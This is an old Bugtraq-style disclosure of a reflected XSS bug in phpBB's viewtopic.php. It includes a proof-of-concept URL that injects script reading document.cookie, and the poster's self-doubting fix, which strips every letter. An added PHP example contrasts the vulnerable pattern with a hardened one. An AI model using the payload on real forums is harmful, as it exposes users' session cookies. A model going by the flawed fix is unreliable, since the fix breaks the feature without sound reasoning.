XSS bug in phpBB

From: Arab VieruZ (arabviersus@hotmail.com)
Date: 11/18/02

    Date: 18 Nov 2002 12:33:41 -0000
    From: Arab VieruZ <arabviersus@hotmail.com>
    To: bugtraq@securityfocus.com
    
    

    Vulnerable systems:
    The Last ver

    Exploit:
    http://phpbb.com/phpBB/viewtopic.php?
    t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>

    (without "*")

    Solution:
    I think that will work, but I'm not sure.

    Open viewtopic.php and put this code:

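    // Encode HTML special characters in the highlight value.
    $highlight = htmlspecialchars($highlight);
    // Strip the listed characters; with /i the A-Z range also removes every letter.
    $highlight = preg_replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $highlight);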
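
An added example, not part of the original post and not phpBB's own code: it shows a reflected `highlight` value breaking out of an HTML attribute and a hardened version that keeps the search terms usable. The function names, the `t=1` topic id and the sample inputs are constructed, and the attribute context is an assumption, since the post does not show where viewtopic.php echoes the value.

```php
<?php
// Added example, not phpBB code. Function names are hypothetical.

// Vulnerable pattern: the raw query value is placed inside an attribute.
function render_link_unsafe(string $highlight): string
{
    return '<a href="viewtopic.php?t=1&highlight=' . $highlight . '">next</a>';
}

// Keep only letters and digits as search terms, separated by single spaces.
function clean_highlight(string $highlight): string
{
    // \p{L} = any letter, \p{N} = any digit; every other run becomes a space.
    $terms = preg_replace('/[^\p{L}\p{N}]+/u', ' ', $highlight);
    // preg_replace returns null on invalid UTF-8 input; treat that as empty.
    return $terms === null ? '' : trim($terms);
}

// Hardened: URL-encode for the query string, then HTML-encode for the attribute.
function render_link_safe(string $highlight): string
{
    $value = rawurlencode(clean_highlight($highlight));
    $href  = 'viewtopic.php?t=1&highlight=' . $value;
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">next</a>';
}

// Constructed inputs: a normal search and a value that tries to close the attribute.
$samples = ['secure login', '"><i>probe</i>'];
foreach ($samples as $s) {
    echo "input : $s\n";
    echo "unsafe: " . render_link_unsafe($s) . "\n";
    echo "safe  : " . render_link_safe($s) . "\n\n";
}
```

For the second input the unsafe link ends its `href` early and emits the `<i>` element as markup, while the safe link carries `highlight=i%20probe%20i` entirely inside the quoted attribute.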


